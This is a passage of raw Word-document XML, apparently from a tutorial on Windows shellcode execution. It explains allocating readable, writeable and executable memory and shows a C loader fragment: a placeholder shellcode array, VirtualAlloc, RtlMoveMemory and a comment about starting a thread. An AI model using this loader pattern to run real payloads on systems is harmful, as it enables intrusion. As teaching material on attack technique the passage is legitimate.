    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>You need to direct the code flow to that memory region</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">The text book method to complete these three steps is to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> calls to dynamically allocate readable, writeable and executable (RWX) memory and start a thread pointing to the freshly allocated memory region. Coding this in C would look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5BC7"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str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>windows.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5BC7"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un"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\x41\x41\x41\x41"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Alloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory</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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">LPVOID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>addressPointer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x3000</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x40</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Copy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RtlMoveMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>addressPointer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread pointing to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
